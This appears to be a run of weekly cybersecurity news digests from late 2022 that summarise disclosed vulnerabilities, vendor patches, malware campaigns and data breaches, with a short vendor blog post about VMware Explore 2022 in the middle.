Github, Dropbox or Discord. Guardio attributes this campaign to the group known as Vermux and indicates that it has mostly affected users in the United States and Canada. Malware variants observed in their research include cryptocurrency miners and the Racoon and Vidar stealers. The use of Google ads in such campaigns appears to have increased recently, leading even the FBI to issue an alert. More info → * * * Zoho fixes critical vulnerability in ManageEngine Zoho has addressed a security flaw affecting several ManageEngine products. The flaw, identified as CVE-2022-47523, is a SQL injection vulnerability affecting Password Manager Pro, PAM360 privileged access management software and Access Manager Plus privileged session management solution. Successful exploitation would provide an attacker with unauthenticated access to the back-end database, allowing any type of query to be performed. Zoho recommends upgrading the affected products to the latest version as soon as possible. More info →

LastPass confirms theft of customer passwords LastPass has announced that its cloud storage system was breached using stolen passwords in an incident last August. The attackers gained access to the company's technical information and source code. Using these keys, they were able to steal customer account information and data stored in the vault, including passwords and notes. While the vault data is encrypted, the company has warned its customers that attackers could attempt to brute-force their master passwords and gain access to all stored information. More info → * * * BlueNoroff incorporates new techniques to bypass Windows MotW measures Researchers have identified new methods for bypassing Windows' Mark of the Web (MotW) protection measures, which have been adopted by the group known as BlueNoroff. This malicious actor, associated with the Lazarus group and known for previous attacks to steal cryptocurrencies, has incorporated new techniques to bypass the warning message that Windows displays to users when they try to open a file downloaded from the internet. This was achieved by making use of file formats with .ISO and .VHD extensions. While the investigation originated from a company in the United Arab Emirates affected by this group, the nomenclature of the domains and documents used in the attack chain would seem to indicate a more specific interest in Japanese companies, in the financial sector in particular. More info → * * * 400 million Twitter users' data for sale A malicious actor named Ryushi recently put a database of 400 million Twitter users up for sale on a popular underground forum. The seller has provided a sample of 1,000 accounts, including private information of prominent users such as Donald Trump Jr and Brian Krebs, as proof of his claims. The seller also claims that the data was extracted through a vulnerability and includes emails and phone numbers of celebrities, politicians, businesses and ordinary users. He also invites Twitter and Elon Musk to buy the data to avoid GDPR lawsuits, alluding to the fact that the Irish Data Protection Commission has opened an investigation into a data breach involving more than 5.4 million Twitter users that was obtained by exploiting an API vulnerability that Twitter had fixed in January 2022. More info → * * * EarSpy: New eavesdropping attack Researchers from five US universities have developed EarSpy, an eavesdropping attack for Android devices capable of recognising the gender and identity of the caller. EarSpy is able to capture data readings from motion sensors caused by the reverberations of mobile device speakers. Although previously considered too weak to generate sufficient vibrations for this type of attack, modern smartphones with more powerful stereo speakers and sensitive motion sensors can register even small resonances. In tests on a OnePlus 7T and OnePlus 9 device, gender identification accuracy ranged from 77.7% to 98.7%, caller ID accuracy ranged from 63.0% to 91.2%, and voice recognition accuracy ranged from 51.8% to 56.4%. User volume, device hardware and motion can affect attack accuracy. Android 13 has introduced a restriction on the collection of sensor data without permission, but this only reduces accuracy by around 10%. More info → * * * Netgear fixes vulnerabilities affecting several router models Netgear has published two security advisories reporting the discovery of high criticality vulnerabilities in several of its router models. No CVE has been assigned, nor has Netgear detailed which component is affected, but it does point out that one of them is a preauthentication buffer overflow security flaw. Exploitation of this type of vulnerability can allow anything from a denial of service to the execution of arbitrary code, without requiring permissions or user interaction. The affected products include several models of Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6) and Wireless AC routers. Finally, it should be noted that exploitation of the second vulnerability could allow a targeted DDoS attack on Wireless AC Nighthawk and Wireless AX Nighthawk (WiFi 6) routers. More info →

SentinelOne: malicious Python package in PyPI Researchers at ReversingLabs have published an investigation in which they report having identified a Python package in PyPI that masquerades as the legitimate SDK client of cybersecurity firm SentinelOne. According to the researchers, malicious actors have created a Trojan with the same name as the SentinelOne company in order to trick victims. The malware also offers a legitimate functionality, which is to access the SentinelOne API from another project. However, this package is obfuscated with malware dedicated to exfiltration of sensitive data from compromised systems. ReversingLabs has reported detecting five similarly named packages uploaded by the same authors between 8 and 11 December 2022, and estimates that they have been downloaded up to 1,000 times in total. More info → * * * OWASSRF: new Microsoft Exchange exploit method The CrowdStrike team has discovered a new method of exploiting Microsoft Exchange that bypasses ProxyNotShell mitigations. This new way of exploiting the flaw, which they have named OWASSRF, was detected while researchers were analysing the entry vectors of the Play ransomware, as they suspected that the operators behind the malware were exploiting ProxyNotShell (CVE-2022-41040 and CVE-2022-41082). However, no evidence of exploitation of the first vulnerability (CVE-2022-41040) was detected, while evidence of exploitation of the second vulnerability (CVE-2022-41082) was detected. According to CrowdStrike, the security flaw, which would serve as initial access to later exploit CVE-2022-41082, has been catalogued as CVE-2022-41080, with a CVSSv3 of 9.8, being a privilege escalation flaw via the Outlook Web Application (OWA) endpoint. It is also worth noting that during the investigation, Huntress Labs threat researcher Dray Agha discovered an attacker's tools exposed in an open repository. These included a PoC for Play's Exchange exploit, which allowed CrowdStrike to replicate the attacks. More info → * * * Achilles: vulnerability in Apple Gatekeeper Within Microsoft has disclosed details on a vulnerability in macOS that would allow bypassing the application execution restrictions of Apple's Gatekeeper security mechanism. The vulnerability, which has been listed as CVE-2022-42821, with a CVSS of 5.5, was discovered by the Microsoft team in July and was fixed with last week's updates to macOS 13 (Ventura), macOS 12.6.2 (Monterey), and macOS 1.7.2 (Big Sur). The Gatekeeper security mechanism consists of checking applications downloaded from the Internet to see if they are approved by Apple, sending a message to the user to confirm before launching them, or issuing an alert that the application cannot be run because it is untrusted. This verification is done by checking the com.apple.quarantine attribute that web browsers assign to downloaded files. The detected vulnerability, also referred to as Achilles, exploits the Access Control List (ACL) permissions model by adding very restrictive permissions to a downloaded file, which prevents Safari from setting the com.apple.quarantine attribute and could allow an attacker to create a malicious application that could be used as an initial access vector for malware or other threats. More info → * * * Glupteba botnet active again Researchers at Nozomi Networks have detected that the Glupteba botnet is active again, after Google stopped its operation a year ago. According to the researchers, the latest campaign reportedly started in June this year and is still active. Glupteba is a backdoor distributed via pay-per-install (PPI) networks in infected installers or software bugs. It is blockchain-enabled, infecting Windows devices to mine cryptocurrencies, steal user credentials, cookies, and deploy proxies on IoT devices and Windows systems. However, the highlight of Glupteba is that it uses the Bitcoin Blockchain to distribute its Command and Control (C2) domains, which makes it highly resistant to deletion, as a validated Bitcoin transaction cannot be deleted or censored. In this regard, Nozomi has observed how the use of Bitcoin addresses has been increasing, as in its first campaign, dating back to 2019, it only used one address, while in the latest one, up to seventeen different addresses have been detected. More info →

Microsoft fixes in its December Patch Tuesday two 0-day vulnerabilities and 49 other bugs Among the fixed vulnerabilities, two of them are 0-day, one of them actively exploited and identified as CVE-2022-44698 and CVSS 5.4, which refers to a bypass vulnerability in the Windows SmartScreen security feature. An attacker could exploit this vulnerability by creating a malicious file that bypasses Mark Of The Web (MOTW) security, resulting in the loss of security features such as protected view in Microsoft Office. Threat actors exploited this vulnerability through malicious JavaScript files in numerous malware distribution campaigns. The other 0-day, identified as CVE-2022-44710 and CVSS 7.8, would allow privilege escalation of the DirectX graphics kernel. The rest of the fixed bugs would allow information disclosure, denial of service and impersonation. Finally, Microsoft has included in its update, 29 improvements and fixes among which fix problems in Task Manager, Microsoft OneDrive or Windows Spotlight. More info → * * * Citrix fixes actively exploited 0-day vulnerability Citrix has issued a security alert warning administrators of a critical, actively exploited, 0-day vulnerability affecting Citrix ADC and Gateway. This flaw, tracked as CVE-2022-27518 and still awaiting CVSS score, would allow an attacker to remotely execute code without authentication. Affected Citrix ADC and Citrix Gateway versions would be those prior to 13.0-58.32 and would be corrected by updating to current 13.0-88.16 or 13.1 versions. Although the company has not yet offered any further details, the security note mentions a small number of targeted attacks taking advantage of this vulnerability. The National Security Agency has issued an advisory stating that the attacks would be attributed to the group known as APT5, UNC2630 or MANGANESE and includes detection and mitigation steps. More info → * * * New Apple 0-day vulnerability exploited Apple has released the monthly security bulletin fixing vulnerabilities affecting iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2 and macOS Ventura 13.1, including the tenth 0-day of the year affecting iPhone devices, which could be actively exploited. Specifically, this security flaw identified as CVE-2022-42856 is a problem in Apple's Webkit browser engine, which could allow threat actors to create a malicious website specially designed to use code execution on a vulnerable device. This vulnerability was discovered by security researcher Clément Lecigne, a member of Google's threat analysis team, and although no further details on this issue are available now, it is expected that more information on this vulnerability will be published sometime after the patches are released once users update their devices. More info → * * * Royal ransomware becomes a potential threat Researchers from Cybereason Global SOC and Cybereason Security Research Teams have published an analysis of the Royal ransomware group, describing its tactics, techniques and procedures (TTP). The ransomware was detected earlier this year, but it was not until September that it began using its own ransomware, making it the most active ransomware at the moment, surpassing Lockbit. Royal's entry vectors are diverse, one of them being through phishing campaigns, also using loaders such as Qbot or BATLOADER, which subsequently implement a Cobalt Strike payload to continue the infection operation. The ransomware is also known to employ multiple threads to speed up encryption, and to use partial encryption, making detection more difficult. Researchers estimate that Royal is made up of former members of other ransomware groups, specifically pointing to Conti. Cybereason also points out that Royal ransomware is a high-potential threat, because its victims are not sector-specific and are spread across the globe. More info → * * * Atlassian cookies allow unauthorized access even with two-factor login enabled Recently, security company CloudSek was the victim of a cyberattack and its internal investigation has uncovered a vulnerability in Atlassian products. CloudSek identified that the threat actor gained access to an employee's Jira account by using a session cookie stolen with a stealer and sold on the darkweb, which led the investigation to reveal that cookies in Atlassian products (Jira, Confluence, Trello and BitBicket) remain valid for 30 days even if the user's password has been changed or two-factor authentication is enabled. Atlassian has not yet patched the vulnerability, so Cloudsek warns of the wide-ranging impact it could have given that it affects more than 10 million users of the 180,000 companies that have signed up for Atlassian products. More info →

Ninth Chrome 0-day of the year Google has released Chrome 108.0.5359.94 for Mac and Linux, and 108.0.5359.94/.95 for Windows, which fixes a 0-day vulnerability, the ninth detected in Chrome this year. Catalogued as CVE-2022-4262 with a high criticality according to Google, it is described as Type confusion in V8 in Google Chrome, for versions prior to 108.0.5359.94. Exploitation of this security flaw could allow a remote attacker to potentially exploit stack corruption via a manipulated HTML page. Google has not provided further details of this flaw detected by Clement Lecigne of Google's Threat Analysis Group on 29 November, until most users have updated their browsers. It is worth noting that the security advisory published by the company reports that an exploit for this vulnerability currently exists. More info → * * * RCE vulnerability in Visual Studio Code Google security researcher Thomas Shadwell has identified an important vulnerability in Visual Studio Code. This security flaw, identified as CVE-2022-41034, with a CVSSv3 of 7.8, could allow malicious actors to perform remote code execution, making it possible to take control of the victim's computer. The methodology used to carry out the attack consists of forwarding a link to a website in order to take over a Visual Studio Code user's computer and any other device connected through Visual Studio Code's remote development feature. According to the researcher, this issue affects GitHub Codespaces, github.dev and Visual Studio Code web and desktop versions. It should be noted that this remote code execution vulnerability affects VS Code 1.71 and earlier versions. It is also recommended to apply the patch released by Microsoft to fix this security flaw. More info → * * * Vulnerability in Netgear routers patched urgently Within the context of Pwn20wn Toronto 2022, a bug hunting competition that has been held as part of the CanSecWest security conference since 2007, the manufacturer of Netgear devices has been forced to patch a vulnerability as a matter of urgency. In this regard, researchers at Tenable have published an article in which, based on code published by Netgear to mitigate the vulnerability in Netgear Nighthawk WiFi6 Router (RAX30 AX2400 series) devices, they reveal details of the patched bug, namely a configuration error at the network level whereby access restriction policies were not being applied correctly to the devices when they had an exposed IPv6 interface. The vulnerability, which at the time of writing has not yet been assigned a CVE, would be mitigated with the update proposed by the manufacturer to versions 1.0.9.90 and later. Following Tenable's indications, it is recommended to perform the manual check since devices with versions higher than v1.0.6.74 would not be able to auto-update automatically. More info → * * * High severity vulnerability in Cisco IP phone devices Cisco has issued a security advisory warning of a high-severity vulnerability affecting several models of its branded IP phone devices. The security flaw, catalogued as CVE-2022-20968, and with a CVSSv3 of 8.1 could allow a malicious actor to cause a stack overflow, triggering a remote code execution or denial of service (DoS) attack. While the company's security incident response team is aware of the existence of a proof of concept, they have no evidence that it has been exploited in attacks. It should be noted that Cisco has indicated that it will release a security patch next January 2023, and that until then it recommends a series of mitigation tips by disabling Cisco's discovery protocol on the affected devices, which are IP Phone 7800 and 8800 Series running firmware version 14.2 and earlier. More info → * * * Zombinder: app repackaging service containing malware Researchers at ThreatFrabric have published an article detailing the existence of a service on the dark web, which they have named Zombinder, that allows threat actors to add malware to legitimate apps in order to evade security controls. The researchers point out that applications repackaged with Zombinder are 100 per cent compliant with their original purpose, so the victim does not suspect that they have been infected with malicious software, usually of the stealer type. ThreatFrabric reports that they have mainly identified the clipper called "Laplas" and well-known information stealers such as "Ermac", "Erbium" and "Aurora" in applications modified by Zombinder. Finally, the service targets Windows and Android operating system app users. More info →

Written by Matheus Bottan Partner Development at Telefonica Tech Formerly dubbed VM World (brand that stamped the first editions since 2004) suffice it to say that VMware Explore is a giant pivot in the software industry evolution and is entrenched among the "don't-miss events" for IT Marketplace and those interested in the modern app infrastructure. During the last VMware Explore (Europe edition), in Barcelona this November, attendees, as usual, had a vast range of activities to participate in. Going from general key notes sessions with the VMware executives, to hands-on labs and hackatons with the cloud and security experts of Tanzu, Vsphere+ and NSX. My personal Experience at VMware Explore 2022 I focused on the partner sessions for professional reasons, went to a few tech sessions, and for fun, stood about 30 minutes in the biggest cue of the event to experiment the McLaren Racing F1 simulator (disastrous 3 laps). Matheus Bottan at VMware Explore Europe 2022 Personally, what I take from the event is the certainty that the adoption of cross-multi-cloud environments will never stop, as admins will keep running their workloads in the best cloud that suits each app. Meaning, you'll run artificial intelligence on GoogleCP; Workplace, in Azure; critical instances, on AWS; and so on. Also, you'd keep top secret, state-of-the-art stuff in some private Cloud as well (e.g. Dell, HP, Oracle, Alibaba, etc.). Let alone the sovereignty clouds projects of the near future. New Tech Trends That said, we cannot not mention K8. The moto of the event was "any app, any cloud, any K8". For the ones not familiar with the acronym, I'm sure you know it by its "scientific" name: Kubernetes. Google open-sourced the Kubernetes project in 2014. Telefónica Tech's Lounge at VMware Explore Europe 2022 Similar to what VMware has done a decade ago with the Virtual Machines, K8 is now the new reality for building complex applications and it is helping to pave the way. Not only to the workplace of the future, but to whole new sectors as true Clean & Bio Tech, Future Hyper-Connectivity & Cybersecurity, Space Tourism, Quantum Computing, to name a few. VMware's Tanzu platform is ready to address and orchestrate the multi-cloud environments needed for these types of cutting-edge deployments. The next wave of tech trends will be a reality pretty soon, and K8 is certainly takes part towards that evolution —as containerized apps push Cybersecurity and IoT/OT (operational technology) to evolve, thus new kinds of network traffic emerge, new methods of deploying software appear, K8 will also evolve within its own chapters —and it seems to be future-proof, as it provides portability of workloads and is largely adopted by all industries. I'll elaborate in a few of those future trends and let's speculate a bit around them, as an exercise of matching them to the subjects of the technical sessions of VMware Explore Europe 2022: Trust Architectures in Cybersecurity: new type of cybercrimes will pop-up in the next decades due to the evolution of machines and software —being a growing tech trend, Trust Architectures will help in the fight against the future cybercrime. Future of Hyper-connectivity: IoT will be virtually in every device by ~2050, meaning super computing power and hyper connectivity needed, which will be provided by Laser Communications technologies & interconnected satellites. Next-Generation Computing Power: shifting from CPU to GPU (or even DPU offloads) will be an ancient topic around ~2040, as real quantum computing will help us find answers to problems that have bedeviled science and society for centuries. Coding 2.0: this is my personal favorite, as I look back to my early career days - from ~2030 on, we'll start to see the new coding platforms, where artificial intelligence codes, and you just watch for debris and deviations. Welcome to software 2.0! —or whatever you want to call the workstation of the developer of the future. True integration of Artificial Intelligence & Robotics: Just imagine, self-replicating nanorobots that can do the dirty work in several critical circumstances; from medical emergencies to space exploration, from extreme farming to rescuing people. Clean Tech: of course, energy will always be a concern to the new coming world, and here Kubernetes is a protagonist and an early-adopter with its super energy-efficiency environments, it will help companies to meet net-zero and ESG standarts. How Telefónica Tech backs VMware technologies and promotes co-innovation projects Emilio Moreno, Product Manager at Telefónica Tech, during our presentation at VMware Explore Europe 2022 Telefonica Tech has a huge wallet of distinct customers in the multi-cloud world and is a leader in digital transformation of our B2B customers, recognized by Industry Analysts’. Partnering with VMware is key not only to our projects with end-users, but also to the internal use of VMware technologies inside our house to build the best Managed Services we possibly can. As we've been doing since many years ago, when Telefonica firstly adopted VMware solutions in our VDC core and edge computing nodes. Stay tuned for more about the Telefonica Tech & VMware new roadmaps of products and co-innovation projects. If you're a customer, reach out to us to learn more about our multi-cloud orchestration SKUs running VMWare technology. See you soon in the next VMware Explore '23!

Urgent update to Chrome to prevent the eighth 0-day of 2022 Google has released an urgent security update for Chrome to prevent exploitation of the eighth 2022 0-day in the browser. The release patches vulnerability CVE-2022-4135, a stack overflow issue. This type of vulnerability allowed an attacker to execute arbitrary code. Google became aware that the vulnerability was being actively exploited by malicious actors, so it released the patch just days after its Threat Analysis Group team discovered the vulnerability. The company has declined to provide details of the problem until users have had time to apply the patch to prevent its exploitation from spreading. Chrome users are advised to update to version 107.0.5304.121/122 for Windows and 107.0.5304.122 for Mac and Linux, which fixes CVE-2022-4135. More info → * * * Data of 5.4 million Twitter users exposed Security researcher Chad Loder posted on Twitter that a database containing 5.4 million entries was currently being shared for free on a forum on the dark web, and that it collected both public (usernames, IDs, followers, location, biography, etc.) and confidential (phone numbers and email addresses) information on users of the social network itself. After the publication, Twitter suspended Loder's account, so he shared the information through Mastodon. According to Loder, this database is the same one that was offered for sale in July and was obtained by exploiting a (now patched) vulnerability in Twitter's API that allowed an attacker to learn the account associated with phone numbers or email addresses. When the sale of the database came to light, Twitter acknowledged the authenticity of the database. More info → * * * Phishing ring that defrauded 12 million euros broken up in Spain The Spanish National Police has issued a statement reporting the success of an operation that has led to the dismantling of a criminal group that had defrauded a total of almost 300 victims of more than 12 million euros by phishing. The six people arrested in Madrid and Barcelona have been charged with alleged membership of a criminal organisation, fraud, money laundering and usurpation of civil status. According to the police statement, the investigation began with the complaint of a Spanish bank for a case of phishing in which it was being impersonated by criminals, who offered through these fake websites financial operations of equities, cryptocurrencies and contracting of financial products to French customers. The police have not made public the malicious URLs used by the criminal organisation. More info → * * * Three vulnerabilities in industrial products from Festo and Codesys Forescout researchers have discovered three vulnerabilities in industrial automation products from the companies Festo and Codesys. The most critical of the three is vulnerability CVE-2022-3270 which, pending publication at NIST, Forescout has preemptively given a CVSS score of CVSS 9.8. The flaw lies in Festo PLCs and would allow an unauthenticated attacker to take control of the device or achieve a denial of service (DoS). Vulnerability CVE-2022-4048, which Forescout has scored with a CVSS 7.7, affects Codesys V3 products and is a weak coding issue that would allow an attacker to logically manipulate the product. F inally, vulnerability CVE-2022-3079, with a CVSS 7.5, allows an unauthenticated attacker to remotely access critical functions of the product website and could allow a denial of service. At this time, no patches have been released for these vulnerabilities. More info → * * * Google's research on the Heliconia framework Google's Threat Analysis Group (TAG) has published the results of an investigation into an exploitation framework targeting already patched vulnerabilities in Chrome, Firefox and Microsoft Defender that could deploy a payload in affected devices, in particular spyware. Google researchers became aware of this framework through an anonymous submission to its Chrome bug-reporting program. It contained three bugs, with instructions and a source code file. "Heliconia Noise" allows deploying an exploit for a Chrome renderer bug followed by a sandbox escape. "Heliconia Soft" deploys a PDF containing a Windows Defender exploit. "Heliconia Files" contains a set of Firefox exploits for Windows and Linux. According to Google, although no active exploitation has been detected, the vulnerabilities were most likely exploited as 0-days before remediation in 2021 and early 2022. It should also be noted that Google has been able to trace the origin of this exploitation framework Heliconia thanks to the analysis of the source code, being able to link its development to the Barcelona-based company Variston IT, a provider of security solutions, according to the information on its website. More info →

Security updates for 35 Cisco vulnerabilities Cisco has released a security update that addresses 35 vulnerabilities in Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD) and Firepower Management Center (FMC). Eight of the 35 vulnerabilities are of high criticality, the highest being CVE-2022-20946 and CVE-2022-20947 (both with a CVSS score of 8.6), which affect Cisco ASA and Cisco FTD products. An unauthenticated attacker could exploit them to achieve a denial-of-service (DoS) condition. In addition, vulnerability CVE-2022-20927 (CVSS of 7.7), which affects the same products as the previous ones and could also lead an attacker to cause a DoS condition, also stands out. Of the remaining bugs, 15 cross-site scripting (XSS) vulnerabilities in the Cisco FMC interface stand out. According to Cisco's bulletin, there are no known active exploits against any of the newly patched vulnerabilities. More info → * * * Large-scale Fangxiao campaign impersonating hundreds of companies The Cyjax team has published research into a sophisticated large-scale campaign in which malicious actors allegedly created and used more than 42,000 web domains. According to the researchers, the Fangxiao group was behind the campaign, whose modus operandi consisted of sending links via WhatsApp that redirected the user to a domain controlled by the attackers, where known companies were impersonated. More than 400 impersonated companies in the banking, retail, energy, travel, etc. sectors have been detected so far. After completing an initial survey under the pretext of winning prizes, users are redirected again to other domains that are constantly changing, ending in the download of an application with the Triada trojan. In other cases, the fraudulent scheme redirects users to Amazon's website via an affiliate link that results in a commission to whoever controls the final redirection. Cases have also been detected where users are referred to a micro-payment SMS scam. Cyjax indicates that the campaign is aimed at users all over the world. More info → * * * Mozilla fixes multiple vulnerabilities Mozilla has announced the release of a new version of the Firefox 107 browser in which numerous vulnerabilities have been fixed. A total of 19 vulnerabilities have been fixed with this new version, of which Mozilla has categorised nine as high impact. Among these, the majority are due to bugs related to memory mismanagement that could lead to program crashes, among other bugs that could lead to disclosure of information or omission of notifications to carry out phishing attacks. An example of this is the vulnerability identified as CVE-2022-45407, whereby an attacker could load a legitimate font file and trigger a crash, a flaw Mozilla calls a "potentially exploitable crash". Another of the fixed vulnerabilities, identified as CVE-2022-45404, is described as "full screen notification bypass". It should be noted that these bugs have also been fixed in Mozilla Thunderbird with version 102.5. More info → * * * New details on the latest Emotet campaign Following the detection of new Emotet infections at the beginning of November, numerous researchers have analysed in detail the latest campaign carried out between 2 and 11 November. As initially reported by Cryptolaemus researchers, one of the most notable changes in this email campaign compared to previous campaigns is that the malicious actors (TA542) instruct victims to copy the malicious Excel attachment to the Templetes folder, where macro protection is not enabled. In addition, new features have also been detected in the Emotet binary, as well as a return to the delivery functionality of other malware families, which have been found to be used to spread new variants of the IcedID loader or Bumblebee. According to the research published by Proofpoint, this campaign has attempted to deliver hundreds of thousands of emails every day with different lures and written in several languages, which has placed victims in Spain, Mexico, Greece, Brazil, the United States, the United Kingdom, Japan, Germany, Italy and France, among others. It is also estimated that, although no activity has been detected since the 11th, it is very likely that TA542 will soon distribute Emotet again as its network is once again fully operational. More info → * * * Qbot changes to misuse Windows 10 control panel The security researcher known on Twitter as "proxylife" (@pr0xylife) has uncovered a phishing campaign involving the Qbot malware, also known as Qakbot, which has been observed to have moved from exploiting a vulnerability in the Windows 7 calculator to exploiting a bug in the 'control. exe' executable in the Windows 10 control panel. Qbot creates a malicious DLL file with the same name and in the same folder as the legitimate DLL, causing Windows to run it and download the trojan onto the victim's computer. In this way, it also manages to evade the protection of antivirus software, as it will not flag as malicious a program that has been installed from the Windows 10 control panel. Once installed on the target computer, Qbot will steal emails for use in phishing campaigns or can even be used to download other types of malware such as Brute Ratel or Cobalt Strike. More info →

Robin Banks Phishing Platform Reactivated Researchers at IronNet have published the second part of their investigation into the Robin Banks phishing-as-a-service platform. The platform was discovered in June this year following the detection of a massive phishing campaign against US financial institutions, after which it was blocked by Cloudflare and its operations were halted. The platform is now reportedly back in business through Russian ISP DDoS-Guard, incorporating new features such as multi-factor authentication and Adspect redirectors, which would help avoid detection by redirecting suspicious traffic to legitimate-looking websites. In addition, Robin Banks also makes use of Evilginx2, a proxy that captures victims' session cookies and helps attackers evade protection measures such as two-factor authentication. More info → * * * Cybersecurity incident at an Orange provider Orange has revealed that one of its suppliers had suffered a cybersecurity incident that resulted in the compromise of personal information of the telecommunications company's customers. According to the company's statement, the incident at the provider occurred several days ago and involved unauthorised access to systems. As a result, the data of a limited number of customers, who have already been notified by Orange via SMS or email, have been compromised. Some of the exposed data would be the name, postal address, email address, telephone number, ID number, date of birth, or bank IBAN code of the customers, although not all of this data would have been exposed in the affected cases. It should be noted that no passwords or credit card details were compromised. The company proceeded to cut off access to the systems when they became aware of the attack, in addition to notifying the Spanish Data Protection Agency and the Central Technological Investigation Brigade (BCIT) of the National Police. More info (PDF) → * * * Microsoft fixes 68 vulnerabilities including six 0-day vulnerabilities In its latest security update, Microsoft has fixed a total of 68 vulnerabilities, six of them included actively exploited 0-day flaws: CVE-2022-41128, a remote code execution vulnerability with a CVSS score of 8.8. CVE-2022-41091, which would allow an attacker to evade Mark-of-the-Web (MOTW) security defences with a CVSS score of 5.4. CVE-2022-41073 and CVE-2022-41125, which would allow a malicious actor to gain system privileges and have a CVSS score of 7.8. CVE-2022-41040 and CVE-2022-41082, privilege escalation and remote code execution vulnerabilities in Microsoft Exchange with a CVSS score of 8.8. These last two would be the vulnerabilities identified last September as ProxyNotShell. Other vulnerabilities categorised by Microsoft as critical and fixed in this latest update are CVE-2022-37966 and CVE-2022-37967 in Windows Kerberos, CVE-2022-41080 in Microsoft Exchange Server and CVE-2022-38015 in Windows Hyper-V. More info → * * * Critical vulnerabilities in Citrix Gateway and Citrix ADC As part of its security bulletin released on Tuesday, Citrix has announced three vulnerabilities that users urgently need to patch affecting its Citrix Gateway and Citrix ADC software. Of these vulnerabilities, CVE-2022-27510 (CVSS 9.8) stands out as a critical flaw that allows bypassing the authentication process by using alternative channels or routes when the application is condivd as a VPN. The other two vulnerabilities are also considered critical by NIST, although Citrix has downgraded their criticality to high and medium respectively. These are CVE-2022-27513 (CVSS 9.6 according to NIST, 8.3 according to manufacturer), which allows attackers to take control of the remote desktop via phishing by not correctly verifying the authenticity of the data when the RDP proxy is condivd in VPN mode; and CVE-2022-27516 (CVSS 9.8 according to NIST, 5.6 according to manufacturer), a vulnerability that allows circumvention of the protection mechanism against brute-force login attempts. This last vulnerability can be exploited in VPN mode or if condivd as an AAA virtual server with a maximum number of login attempts. The company has already patched these flaws for customers of its cloud services, but users who directly manage this software will have to patch individually. More info → * * * StrelaStealer: new malware to steal email credentials Researchers at DCSO CyTec have identified a new malware, named StrelaStealer, that steals email credentials from Outlook and Thunderbird. The malware is distributed via ISO files attached to emails with different content. In one of the variants observed, this attachment was a polyglot file, which can be interpreted as different formats depending on the application with which it is opened. In the case analysed, this file could either act by downloading StrelaStealer, or display a decoy document in the default browser.The campaign was reportedly first observed in November 2022 targeting Spanish-speaking users. More info →

Campaigns spreading ERMAC malware A team of Cyble researchers recently discovered a mass phishing campaign aimed at spreading the ERMAC banking trojan. The infection method is based on downloading fake apps that impersonate Google Wallet, PayPal, Snapchat and others. These fake apps are downloaded from fake domains with websites that impersonate some of the most popular Android markets. These impersonations also include fake domains based on the companies allegedly distributing the apps. Once these fake apps are executed, the ERMAC malware proceeds to steal data such as contact and SMS information, as well as a list of apps in use by the device. Phishing pages are displayed on the victim's screen via that latter function, which in turn sends the collected data to the malware's Command & Control via POST requests. More info → * * * Apple fixes 0-day vulnerability for iOS and iPadOS in latest patch The latest update released by Apple fixes, among others, a 0-day vulnerability that could have been actively exploited against iPhone and iPad devices. This vulnerability, identified as CVE-2022-42827 and still pending CVSS qualification by Apple, would allow an attacker to execute arbitrary code in the Kernel with the highest privileges. This could lead to data corruption, performance disruption or unauthorised code execution on the device. The update that fixes this vulnerability would be available for iPhone 8 models onwards, all iPad Pro models, iPad Air third generation and above, and iPad and iPad Mini fifth generation and above More info → * * * VMware fixes critical vulnerability in Cloud Foundation VMware has issued an advisory on two vulnerabilities affecting its Cloud Foundation hybrid platform, including a critical one. The first, identified as CVE-2021-39144 with a CVSS score of 8.5 (9.8 according to VMware), is a remote code execution vulnerability through the Xstream library. The second, identified as CVE-2022-31678 with a CVSS score of 5.3 assigned by VMware, could allow an attacker to cause a denial of service or expose information. Both vulnerabilities would affect VMware Cloud Foundation (NSX-V) version 3.11 and would be fixed with the latest update. More info → * * * Critical vulnerability in OpenSSL announced The OpenSSL Project team has announced that it will release a new version of OpenSSL, version 3.0.7 on November 1st, which will include a security patch that has been classified as critical. While no details have been released of the serious vulnerability that will be fixed in this release beyond the fact that it does not affect versions prior to 3.0, its mere existence has caused concern as it is the first critical vulnerability to be announced by OpenSSL since 2016. Although the developers have announced the deployment of the new version and the bug in advance so that users have time to take inventories and prepare their systems, OpenSSL does not believe that this will be enough for attackers to discover the vulnerability, as Mark J. Cox, a member of the team, has stated. More info → * * * Zoom vulnerability could expose users to phishing attacks Zoom has issued a security bulletin fixing a vulnerability susceptible to URL scanning. Listed as CVE-2022-28763 with a CVSS of 8.8, the flaw could be exploited by a malicious actor using a specially crafted Zoom meeting URL to redirect a user to an arbitrary network address, enabling additional types of attacks, including taking control of the active session. The products affected by this vulnerability include Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows), Zoom VDI Windows Meeting Clients, and Zoom Rooms for Conference Room (for Android, iOS, Linux, macOS, and Windows), all in versions prior to version 5.12.2. Zoom recommends updating or downloading the latest software. More info → * * * Drinik: Android banking trojan re-emerges with advanced capabilities Analysts at Cyble have detected a new version of the Drinik banking malware, targeting Android systems, and currently targeting 18 banking institutions in India. According to Cyble's report, the trojan poses as the country's official tax administration app (iAssist) to steal victims' personal information and banking credentials. Once installed on the victim's device, the application requests permissions to write to external storage, receive, read and send SMS, and read the call log. It will also request permission to make use of Android's accessibility service, which will disable Google Play Protect and enable the malware to perform navigation gestures, record the screen and capture keystrokes and user credentials, displaying the legitimate Indian income tax site in the app. As an end goal, Drinik redirects victims to an Income Tax Department phishing website where, under the guise of a refund in their favour, it will ask the user for their financial information, including account number, credit card number, CVV and PIN. Drinik has been known since 2016 and has been evolving continuously improving its capabilities and targeting mass audiences, such as Indian taxpayers and bank customers in this case. More info →

The Noname057(16) group attacks the Spanish Ministry of Defense Last Friday, threat actor Noname057(016) carried out an attack against the website of the Spanish Ministry of Defense, rendering them unavailable over a short period of time. Noname057(16) is a group with political motivation that tends to carry out denial-of-service attacks against its victims, which are usually institutions and companies from EU or NATO countries, especially in the public, transport and telecommunications sectors. The group has been acting through this type of attacks since March of 2022, when their Telegram channel was created, but has increased its activities since last Summer. Additionally, the group has recently claimed that they are not to be confused with the Killnet hacktivist group, which has a similar profile and modus operandi. More info → * * * Microsoft reports a miscondivd endpoint of its own Microsoft Security Response Center has reported the remediation of a miscondivd endpoint, which could have resulted in unauthorised access to data contained on the endpoint. The information that could have been exposed involved business transactions between Microsoft and customers, including sensitive information such as personal names, email addresses, email content, company names, phone numbers, or document attachments. Microsoft became aware of the miscondivd endpoint on 24 September thanks to a tip-off from SOCRadar, and then proceeded to 